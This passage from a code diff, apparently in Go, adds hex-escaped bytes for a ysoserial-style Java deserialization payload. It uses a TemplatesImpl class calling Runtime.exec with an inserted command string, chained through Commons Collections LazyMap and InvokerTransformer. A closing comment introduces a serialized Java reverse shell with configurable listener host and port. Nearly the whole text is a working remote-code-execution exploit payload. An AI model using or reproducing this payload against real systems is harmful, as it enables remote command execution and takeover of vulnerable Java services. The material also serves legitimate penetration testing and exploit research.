+		"\x00\x35\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c" +
+		"\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74" +
+		"\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53" +
+		"\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50" +
+		"\x61\x79\x6c\x6f\x61\x64\x3b\x01\x00\x09\x74\x72" +
+		"\x61\x6e\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c" +
+		"\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f" +
+		"\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e" +
+		"\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73" +
+		"\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f" +
+		"\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70" +
+		"\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74" +
+		"\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c" +
+		"\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69" +
+		"\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65" +
+		"\x72\x3b\x29\x56\x01\x00\x08\x64\x6f\x63\x75\x6d" +
+		"\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d\x2f\x73" +
+		"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68" +
+		"\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65" +
+		"\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44" +
+		"\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64\x6c\x65" +
+		"\x72\x73\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73" +
+		"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68" +
+		"\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e" +
+		"\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65" +
+		"\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74" +
+		"\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01" +
+		"\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73" +
+		"\x07\x00\x27\x01\x00\xa6\x28\x4c\x63\x6f\x6d\x2f" +
+		"\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63" +
+		"\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74" +
+		"\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f" +
+		"\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e" +
+		"\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f" +
+		"\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c" +
+		"\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73" +
+		"\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c\x63\x6f" +
+		"\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70" +
+		"\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74" +
+		"\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c" +
+		"\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69" +
+		"\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65" +
+		"\x72\x3b\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61" +
+		"\x74\x6f\x72\x01\x00\x35\x4c\x63\x6f\x6d\x2f\x73" +
+		"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68" +
+		"\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e" +
+		"\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78" +
+		"\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x01" +
+		"\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01\x00\x41" +
+		"\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67" +
+		"\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f" +
+		"\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72" +
+		"\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69" +
+		"\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e" +
+		"\x64\x6c\x65\x72\x3b\x01\x00\x0a\x53\x6f\x75\x72" +
+		"\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64" +
+		"\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a" +
+		"\x00\x0b\x07\x00\x28\x01\x00\x33\x79\x73\x6f\x73" +
+		"\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61" +
+		"\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67" +
+		"\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e" +
+		"\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01" +
+		"\x00\x40\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72" +
+		"\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c" +
+		"\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f" +
+		"\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d" +
+		"\x65\x2f\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72" +
+		"\x61\x6e\x73\x6c\x65\x74\x01\x00\x14\x6a\x61\x76" +
+		"\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69" +
+		"\x7a\x61\x62\x6c\x65\x01\x00\x39\x63\x6f\x6d\x2f" +
+		"\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63" +
+		"\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74" +
+		"\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f" +
+		"\x54\x72\x61\x6e\x73\x6c\x65\x74\x45\x78\x63\x65" +
+		"\x70\x74\x69\x6f\x6e\x01\x00\x1f\x79\x73\x6f\x73" +
+		"\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61" +
+		"\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67" +
+		"\x65\x74\x73\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69" +
+		"\x74\x3e\x01\x00\x11\x6a\x61\x76\x61\x2f\x6c\x61" +
+		"\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x07\x00" +
+		"\x2a\x01\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69" +
+		"\x6d\x65\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61" +
+		"\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d" +
+		"\x65\x3b\x0c\x00\x2c\x00\x2d\x0a\x00\x2b\x00\x2e" +
+
+		// 255 characters were allocated, we just put back the unused
+		// length as spaces
+		"\x01\x00\xff" + commandStr + strings.Repeat(" ", 0xff-len(commandStr)) +
+
+		"\x08\x00\x30\x01\x00\x04" +
+		"\x65\x78\x65\x63\x01\x00\x27\x28\x4c\x6a\x61\x76" +
+		"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e" +
+		"\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e" +
+		"\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x3b\x0c\x00" +
+		"\x32\x00\x33\x0a\x00\x2b\x00\x34\x01\x00\x0d\x53" +
+		"\x74\x61\x63\x6b\x4d\x61\x70\x54\x61\x62\x6c\x65" +
+		"\x01\x00\x1d\x79\x73\x6f\x73\x65\x72\x69\x61\x6c" +
+		"\x2f\x50\x77\x6e\x65\x72\x37\x34\x30\x30\x32\x30" +
+		"\x33\x39\x32\x34\x35\x37\x39\x31\x01\x00\x1f\x4c" +
+		"\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77" +
+		"\x6e\x65\x72\x37\x34\x30\x30\x32\x30\x33\x39\x32" +
+		"\x34\x35\x37\x39\x31\x3b\x00\x21\x00\x02\x00\x03" +
+		"\x00\x01\x00\x04\x00\x01\x00\x1a\x00\x05\x00\x06" +
+		"\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x04" +
+		"\x00\x01\x00\x0a\x00\x0b\x00\x01\x00\x0c\x00\x00" +
+		"\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7" +
+		"\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00" +
+		"\x06\x00\x01\x00\x00\x00\x2f\x00\x0e\x00\x00\x00" +
+		"\x0c\x00\x01\x00\x00\x00\x05\x00\x0f\x00\x38\x00" +
+		"\x00\x00\x01\x00\x13\x00\x14\x00\x02\x00\x0c\x00" +
+		"\x00\x00\x3f\x00\x00\x00\x03\x00\x00\x00\x01\xb1" +
+		"\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01" +
+		"\x00\x00\x00\x33\x00\x0e\x00\x00\x00\x20\x00\x03" +
+		"\x00\x00\x00\x01\x00\x0f\x00\x38\x00\x00\x00\x00" +
+		"\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01" +
+		"\x00\x17\x00\x18\x00\x02\x00\x19\x00\x00\x00\x04" +
+		"\x00\x01\x00\x1a\x00\x01\x00\x13\x00\x1b\x00\x02" +
+		"\x00\x0c\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00" +
+		"\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00" +
+		"\x06\x00\x01\x00\x00\x00\x36\x00\x0e\x00\x00\x00" +
+		"\x2a\x00\x04\x00\x00\x00\x01\x00\x0f\x00\x38\x00" +
+		"\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00" +
+		"\x00\x00\x01\x00\x1c\x00\x1d\x00\x02\x00\x00\x00" +
+		"\x01\x00\x1e\x00\x1f\x00\x03\x00\x19\x00\x00\x00" +
+		"\x04\x00\x01\x00\x1a\x00\x08\x00\x29\x00\x0b\x00" +
+		"\x01\x00\x0c\x00\x00\x00\x24\x00\x03\x00\x02\x00" +
+		"\x00\x00\x0f\xa7\x00\x03\x01\x4c\xb8\x00\x2f\x12" +
+		"\x31\xb6\x00\x35\x57\xb1\x00\x00\x00\x01\x00\x36" +
+		"\x00\x00\x00\x03\x00\x01\x03\x00\x02\x00\x20\x00" +
+		"\x00\x00\x02\x00\x21\x00\x11\x00\x00\x00\x0a\x00" +
+		"\x01\x00\x02\x00\x23\x00\x10\x00\x09\x75\x71\x00" +
+		"\x7e\x00\x0e\x00\x00\x01\xd4\xca\xfe\xba\xbe\x00" +
+		"\x00\x00\x32\x00\x1b\x0a\x00\x03\x00\x15\x07\x00" +
+		"\x17\x07\x00\x18\x07\x00\x19\x01\x00\x10\x73\x65" +
+		"\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55" +
+		"\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e" +
+		"\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\x71" +
+		"\xe6\x69\xee\x3c\x6d\x47\x18\x01\x00\x06\x3c\x69" +
+		"\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00" +
+		"\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e\x65" +
+		"\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01" +
+		"\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61" +
+		"\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74" +
+		"\x68\x69\x73\x01\x00\x03\x46\x6f\x6f\x01\x00\x0c" +
+		"\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73" +
+		"\x01\x00\x25\x4c\x79\x73\x6f\x73\x65\x72\x69\x61" +
+		"\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75" +
+		"\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24" +
+		"\x46\x6f\x6f\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63" +
+		"\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67" +
+		"\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a\x00" +
+		"\x0b\x07\x00\x1a\x01\x00\x23\x79\x73\x6f\x73\x65" +
+		"\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64" +
+		"\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65" +
+		"\x74\x73\x24\x46\x6f\x6f\x01\x00\x10\x6a\x61\x76" +
+		"\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63" +
+		"\x74\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f" +
+		"\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65" +
+		"\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c" +
+		"\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74" +
+		"\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x00\x21" +
+		"\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1a" +
+		"\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02" +
+		"\x00\x08\x00\x01\x00\x01\x00\x0a\x00\x0b\x00\x01" +
+		"\x00\x0c\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00" +
+		"\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00" +
+		"\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x3a\x00" +
+		"\x0e\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00" +
+		"\x0f\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00" +
+		"\x02\x00\x14\x00\x11\x00\x00\x00\x0a\x00\x01\x00" +
+		"\x02\x00\x16\x00\x10\x00\x09\x70\x74\x00\x04\x50" +
+		"\x77\x6e\x72\x70\x77\x01\x00\x78\x73\x72\x00\x2a" +
+		"\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63" +
+		"\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65" +
+		"\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c" +
+		"\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79" +
+		"\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74" +
+		"\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61" +
+		"\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e" +
+		"\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e" +
+		"\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65" +
+		"\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e" +
+		"\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f" +
+		"\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f" +
+		"\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e" +
+		"\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73" +
+		"\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c" +
+		"\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67" +
+		"\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c" +
+		"\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c" +
+		"\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d" +
+		"\x65\x71\x00\x7e\x00\x09\x5b\x00\x0b\x69\x50\x61" +
+		"\x72\x61\x6d\x54\x79\x70\x65\x73\x71\x00\x7e\x00" +
+		"\x08\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76" +
+		"\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63" +
+		"\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00" +
+		"\x00\x78\x70\x00\x00\x00\x00\x74\x00\x0e\x6e\x65" +
+		"\x77\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72" +
+		"\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c" +
+		"\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16" +
+		"\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00" +
+		"\x00\x00\x00\x73\x72\x00\x11\x6a\x61\x76\x61\x2e" +
+		"\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70" +
+		"\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46" +
+		"\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72" +
+		"\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64" +
+		"\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08" +
+		"\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"
+
+	return []byte(payloadBytes), nil
+}
+
 // This is a serialized java reverse shell. The gadget was generated by ysoserial
 // but using the code in this pull https://github.com/frohoff/ysoserial/pull/96
 // and updated to make it easy to swap in the desired lhost+lport of our choosing